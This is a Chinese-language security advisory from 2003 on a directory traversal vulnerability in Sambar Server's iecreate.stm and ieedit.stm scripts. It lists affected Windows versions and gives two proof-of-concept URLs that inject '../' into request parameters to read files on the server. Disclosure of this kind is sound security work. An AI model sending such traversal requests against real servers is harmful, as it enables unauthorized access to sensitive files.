|
|
Sambar Server远程文件泄露漏洞
发布时间:2003-04-10
更新时间:2003-04-10
严重程度:中
威胁程度:远程非授权文件存取
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID:7208
受影响系统Sambar Server 5.1
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Professional
-Microsoft Windows 2000 Professional SP1
-Microsoft Windows 2000 Professional SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
-Microsoft Windows 95
-Microsoft Windows 98
-Microsoft Windows 98SE
-Microsoft Windows ME
-Microsoft Windows NT Enterprise Server 4.0
-Microsoft Windows NT Enterprise Server 4.0 SP1
-Microsoft Windows NT Enterprise Server 4.0 SP2
-Microsoft Windows NT Enterprise Server 4.0 SP3
-Microsoft Windows NT Enterprise Server 4.0 SP4
-Microsoft Windows NT Enterprise Server 4.0 SP5
-Microsoft Windows NT Enterprise Server 4.0 SP6
-Microsoft Windows NT Enterprise Server 4.0 SP6a
-Microsoft Windows NT Server 4.0
-Microsoft Windows NT Server 4.0 SP1
-Microsoft Windows NT Server 4.0 SP2
-Microsoft Windows NT Server 4.0 SP3
-Microsoft Windows NT Server 4.0 SP4
-Microsoft Windows NT Server 4.0 SP5
-Microsoft Windows NT Server 4.0 SP6
-Microsoft Windows NT Server 4.0 SP6a
-Microsoft Windows NT Workstation 4.0
-Microsoft Windows NT Workstation 4.0 SP1
-Microsoft Windows NT Workstation 4.0 SP2
-Microsoft Windows NT Workstation 4.0 SP3
-Microsoft Windows NT Workstation 4.0 SP4
-Microsoft Windows NT Workstation 4.0 SP5
-Microsoft Windows NT Workstation 4.0 SP6
-Microsoft Windows NT Workstation 4.0 SP6a
Sambar Server 5.2 b
-Microsoft Windows 2000 Advanced Server
-Microsoft Windows 2000 Advanced Server SP1
-Microsoft Windows 2000 Advanced Server SP2
-Microsoft Windows 2000 Datacenter Server
-Microsoft Windows 2000 Datacenter Server SP1
-Microsoft Windows 2000 Datacenter Server SP2
-Microsoft Windows 2000 Professional
-Microsoft Windows 2000 Professional SP1
-Microsoft Windows 2000 Professional SP2
-Microsoft Windows 2000 Server
-Microsoft Windows 2000 Server SP1
-Microsoft Windows 2000 Server SP2
-Microsoft Windows 95
-Microsoft Windows 98
-Microsoft Windows 98SE
-Microsoft Windows ME
-Microsoft Windows NT Enterprise Server 4.0
-Microsoft Windows NT Enterprise Server 4.0 SP1
-Microsoft Windows NT Enterprise Server 4.0 SP2
-Microsoft Windows NT Enterprise Server 4.0 SP3
-Microsoft Windows NT Enterprise Server 4.0 SP4
-Microsoft Windows NT Enterprise Server 4.0 SP5
-Microsoft Windows NT Enterprise Server 4.0 SP6
-Microsoft Windows NT Enterprise Server 4.0 SP6a
-Microsoft Windows NT Server 4.0
-Microsoft Windows NT Server 4.0 SP1
-Microsoft Windows NT Server 4.0 SP2
-Microsoft Windows NT Server 4.0 SP3
-Microsoft Windows NT Server 4.0 SP4
-Microsoft Windows NT Server 4.0 SP5
-Microsoft Windows NT Server 4.0 SP6
-Microsoft Windows NT Server 4.0 SP6a
-Microsoft Windows NT Workstation 4.0
-Microsoft Windows NT Workstation 4.0 SP1
-Microsoft Windows NT Workstation 4.0 SP2
-Microsoft Windows NT Workstation 4.0 SP3
-Microsoft Windows NT Workstation 4.0 SP4
-Microsoft Windows NT Workstation 4.0 SP5
-Microsoft Windows NT Workstation 4.0 SP6
-Microsoft Windows NT Workstation 4.0 SP6a
Sambar Server 5.2
Sambar Server 5.3 b4 详细描述
Sambar Server的脚本iecreate.stm和ieedit.stm没有正确验证URL请求,通过在请求中混入“../”字串会导致在服务器端产生目录遍历,可能使远程入侵者获取某些敏感文件的内容。
测试代码
http://[target]/sysuser/docmgr/iecreate.stm?template=../
http://[target]/sysuser/docmgr/ieedit.stm?url=../
解决方案
厂商还未提供解决方案。
相关信息
Gregory Le Bras <gregory.lebras@security-corporation.com>
Multiple vulnerabilities in Sambar Server
http://www.security-corporation.com/index.php?id=advisories&a=012-FR
|
